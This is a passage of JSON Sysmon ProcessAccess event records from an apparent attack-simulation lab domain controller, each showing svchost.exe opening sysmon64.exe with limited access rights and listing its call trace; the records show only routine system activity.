C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1571,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1572,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1573,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1574,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1575,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1576,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1577,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1578,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 